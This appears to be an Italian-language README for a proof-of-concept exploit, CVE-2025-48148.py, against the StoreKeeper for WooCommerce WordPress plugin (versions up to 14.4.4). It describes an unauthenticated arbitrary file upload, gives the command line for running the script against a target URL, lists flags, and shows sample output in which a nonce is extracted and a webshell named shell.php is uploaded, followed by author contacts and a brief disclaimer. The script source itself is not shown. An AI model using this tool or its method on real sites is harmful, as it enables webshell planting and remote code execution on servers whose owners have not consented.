
StoreKeeper for WooCommerce <= 14.4.4 - Caricamento di file arbitrario non autenticato
StoreKeeper for WooCommerce <= 14.4.4 - Caricamento Arbitrario di File Non Autenticato
Il plugin StoreKeeper for WooCommerce per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file in tutte le versioni fino alla 14.4.4 inclusa.
Ciò consente a utenti non autenticati di caricare file arbitrari sul server del sito interessato, portando potenzialmente all'esecuzione remota di codice.
Nome dello Script: CVE-2025-48148.py
Questo script è un exploit proof-of-concept professionale per CVE-2025-48148, progettato per automatizzare il processo di caricamento di una webshell su siti WordPress vulnerabili che utilizzano il plugin StoreKeeper for WooCommerce.
nonce richiesto direttamente dall'URL target, garantendo affidabilità anche se il valore cambia.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
Flag opzionali:
--debug Abilita output verboso.--insecure Salta la verifica del certificato SSL.Esempio:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 Email: [email protected]
📨 Telegram: @Kxploit
Questo script è fornito esclusivamente per scopi educativi e di test di penetrazione autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottenere sempre il permesso appropriato prima di testare qualsiasi sistema.
By: Nxploited ( Khaled Alenazi )